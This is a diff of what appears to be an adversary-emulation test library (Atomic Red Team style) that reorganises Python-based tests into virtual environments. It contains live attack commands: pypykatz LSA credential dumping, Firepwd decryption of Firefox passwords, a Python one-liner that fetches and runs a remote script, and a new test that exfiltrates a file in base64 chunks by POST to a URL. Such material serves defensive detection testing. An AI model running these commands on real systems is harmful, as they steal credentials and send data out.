          $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
        name: sh
-        cleanup_command: "rm #{payload_file_name} \n"
+        cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2>
+          nul\n"
    - name: Execute Python via scripts
      auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
      description: Create Python file (.py) that downloads and executes shell script
@@ -67908,44 +67908,51 @@ credential-access:
        elevation_required: true
    - name: Registry parse with pypykatz
      auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
-      description: 'Parses registry hives to obtain stored credentials
+      description: |
+        Parses registry hives to obtain stored credentials.

-        '
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
      supported_platforms:
      - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
+      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "Python 3 must be installed manually"
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
-      - description: 'Computer must have pip installed
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "PIP must be installed manually"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }

          '
-      - description: 'pypykatz must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"

          '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null

          '
      executor:
-        command: 'pypykatz live registry
-
-          '
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
        name: command_prompt
        elevation_required: true
    - name: esentutl.exe SAM copy
@@ -70018,14 +70025,16 @@ credential-access:
      auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
      description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird,
        Firefox) passwords.\nUpon successful execution, the decrypted credentials
-        will be output to a text file, as well as displayed on screen. \n"
+        will be output to a text file, as well as displayed on screen. \n\nWill create
+        a Python virtual environment within the External Payloads folder that can
+        be deleted manually post test execution.\n"
      supported_platforms:
      - windows
      input_arguments:
        Firepwd_Path:
          description: Filepath for Firepwd.py
          type: string
-          default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py
        Out_Filepath:
          description: Filepath to output results to
          type: string
@@ -70038,17 +70047,12 @@ credential-access:
          description: Filepath to python
          type: string
          default: C:\Program Files\Python310\python.exe
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004
      dependency_executor_name: powershell
      dependencies:
-      - description: 'Firepwd must exist at #{Firepwd_Path}
-
-          '
-        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
      - description: 'Firefox profile directory must be present

          '
@@ -70084,36 +70088,52 @@ credential-access:
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Pip must be installed.
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip -v) {exit 0} else {exit 1}
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: 'Firepwd must exist at #{Firepwd_Path}
+
+          '
+        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
      - description: "Pycryptodome library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pycryptodome) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe
+          install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" |
+          out-null} else {write-host "Visual Studio Build Tools (C++ Support) must
+          be installed to continue gathering this prereq"}
+
+          '
      - description: "Pyasn1 library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pyasn1) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else
+          {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe
+          install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null}
+          else {write-host "Visual Studio Build Tools (C++ Support) must be installed
+          to continue gathering this prereq."}
+
+          '
      executor:
        name: powershell
        command: |
          $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-          cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+          cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
          cat #{Out_Filepath}
        cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue
          \  \n"
@@ -71149,42 +71169,50 @@ credential-access:
        Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

        Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
+
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
      supported_platforms:
      - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
+      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'pypykatz must be installed and part of PATH
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }

          '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null

          '
      executor:
-        command: 'pypykatz live lsa
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
+        cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul

          '
        name: command_prompt
@@ -81068,40 +81096,47 @@ discovery:
          description: hostname or ip address to connect to.
          type: string
          default: 192.168.1.1
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
+        prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit
+          1 }

          '
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'adidnsdump must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"

          '
-        prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+      - description: 'adidnsdump must be installed

          '
-        get_prereq_command: 'pip3 install adidnsdump
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          adidnsdump 2>&1 | Out-Null

          '
      executor:
-        command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+        command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass}
+          --print-zones #{host_name}

          '
        name: command_prompt
@@ -81386,7 +81421,8 @@ discovery:
      - description: 'Check if python exists on the machine

          '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
        get_prereq_command: |
@@ -92331,7 +92367,39 @@ exfiltration:
      - 'Network Traffic: Network Traffic Flow'
      x_mitre_is_subtechnique: false
      identifier: T1030
-    atomic_tests: []
+    atomic_tests:
+    - name: Network-Based Data Transfer in Small Chunks
+      auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
+      description: Simulate transferring data over a network in small chunks to evade
+        detection.
+      supported_platforms:
+      - windows
+      input_arguments:
+        source_file_path:
+          description: Path to the source file to transfer.
+          type: path
+          default: "[User specified]"
+        destination_url:
+          description: URL of the destination server.
+          type: url
+          default: http://example.com
+        chunk_size:
+          description: Size of each data chunk (in KB).
+          type: integer
+          default: 1024
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $file = [System.IO.File]::OpenRead(#{source_file_path})
+          $chunkSize = #{chunk_size} * 1KB
+          $buffer = New-Object Byte[] $chunkSize
+
+          while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+              $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+              Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+          }
+          $file.Close()
  T1537:
    technique:
      x_mitre_platforms:
@@ -363,6 +363,8 @@ Python 3 must be installed, use the get_prereq_command's to meet the prerequisit

 Successful execution of this test will display multiple usernames and passwords/hashes to the screen.

+Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
+
 **Supported Platforms:** Windows


@@ -372,53 +374,55 @@ Successful execution of this test will display multiple usernames and passwords/



+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_001|
+

 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


 ```cmd
-pypykatz live lsa
+"#{venv_path}\Scripts\pypykatz" live lsa
+```
+
+#### Cleanup Commands:
+```cmd
+del "%temp%\nanodump.dmp" > nul 2> nul
 ```



-
-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
-```cmd
-py -3 --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
+```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Computer must have pip installed
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
-```cmd
-py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+```powershell
+py -m venv "#{venv_path}"
 ```
-##### Description: pypykatz must be installed and part of PATH
+##### Description: pypykatz must be installed
 ##### Check Prereq Commands:
-```cmd
-pypykatz -h >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-pip install pypykatz
+```powershell
+& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
 ```


@@ -82,7 +82,9 @@ del %temp%\security >nul 2> nul
 <br/>

 ## Atomic Test #2 - Registry parse with pypykatz
-Parses registry hives to obtain stored credentials
+Parses registry hives to obtain stored credentials.
+
+Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

 **Supported Platforms:** Windows

@@ -93,47 +95,51 @@ Parses registry hives to obtain stored credentials



+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_002|
+

 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


 ```cmd
-pypykatz live registry
+"#{venv_path}\Scripts\pypykatz" live lsa
 ```




-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
-```cmd
-py -3 --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-echo "Python 3 must be installed manually"
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Computer must have pip installed
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
-```cmd
-py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-echo "PIP must be installed manually"
+```powershell
+py -m venv "#{venv_path}"
 ```
-##### Description: pypykatz must be installed and part of PATH
+##### Description: pypykatz must be installed
 ##### Check Prereq Commands:
-```cmd
-pypykatz -h >nul 2>&1
-exit /b %errorlevel%
+```powershell
+if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
-```cmd
-pip install pypykatz
+```powershell
+& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
 ```


@@ -351,13 +351,14 @@ Successful execution of this test will list dns zones in the terminal.
 | user_name | username including domain. | string | domain&#92;user|
 | acct_pass | Account password. | string | password|
 | host_name | hostname or ip address to connect to. | string | 192.168.1.1|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1018|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


 ```cmd
-adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ```


@@ -367,7 +368,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1}
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -375,27 +376,23 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Computer must have pip installed
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
 ```powershell
-if (pip3 -V) {exit 0} else {exit 1}
+if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+py -m venv "#{venv_path}"
 ```
-##### Description: adidnsdump must be installed and part of PATH
+##### Description: adidnsdump must be installed
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
-pip3 install adidnsdump
+& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
 ```


@@ -6,6 +6,8 @@

 - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)

+- [Atomic Test #2 - Network-Based Data Transfer in Small Chunks](#atomic-test-2---network-based-data-transfer-in-small-chunks)
+

 <br/>

@@ -57,4 +59,47 @@ if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/s



+<br/>
+<br/>
+
+## Atomic Test #2 - Network-Based Data Transfer in Small Chunks
+Simulate transferring data over a network in small chunks to evade detection.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f0287b58-f4bc-40f6-87eb-692e126e7f8f
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| source_file_path | Path to the source file to transfer. | path | [User specified]|
+| destination_url | URL of the destination server. | url | http://example.com|
+| chunk_size | Size of each data chunk (in KB). | integer | 1024|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$file = [System.IO.File]::OpenRead(#{source_file_path})
+$chunkSize = #{chunk_size} * 1KB
+$buffer = New-Object Byte[] $chunkSize
+
+while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+    $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+    Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+}
+$file.Close()
+```
+
+
+
+
+
+
 <br/>
@@ -215,7 +215,7 @@ python "#{filename}" -i #{host_ip}
 ##### Description: Check if python exists on the machine
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1}
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -48,7 +48,8 @@ $which_python -c 'import requests;import os;url = "#{script_url}";malicious_comm

 #### Cleanup Commands:
 ```sh
-rm #{payload_file_name}
+rm #{payload_file_name} 
+pip-autoremove pypykatz >nul 2> nul
 ```


@@ -420,7 +420,9 @@ Stop-Process -Name msedge

 ## Atomic Test #8 - Decrypt Mozilla Passwords with Firepwd.py
 Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
-Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen.
+Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. 
+
+Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

 **Supported Platforms:** Windows

@@ -434,10 +436,11 @@ Upon successful execution, the decrypted credentials will be output to a text fi
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Firepwd.py|
+| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1555.004&#92;Scripts&#92;Firepwd.py|
 | Out_Filepath | Filepath to output results to | string | $env:temp&#92;T1555.003Test8.txt|
 | VS_CMD_Path | Filepath to Visual Studio Build Tools Command prompt | string | C:&#92;Program Files (x86)&#92;Microsoft Visual Studio&#92;2022&#92;BuildTools&#92;VC&#92;Auxiliary&#92;Build&#92;vcvars64.bat|
 | Python_Path | Filepath to python | string | C:&#92;Program Files&#92;Python310&#92;python.exe|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1555.004|


 #### Attack Commands: Run with `powershell`! 
@@ -445,7 +448,7 @@ Upon successful execution, the decrypted credentials will be output to a text fi

 ```powershell
 $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
 cat #{Out_Filepath}
 ```

@@ -457,16 +460,6 @@ Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue


 #### Dependencies:  Run with `powershell`!
-##### Description: Firepwd must exist at #{Firepwd_Path}
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
-```
 ##### Description: Firefox profile directory must be present
 ##### Check Prereq Commands:
 ```powershell
@@ -504,41 +497,42 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
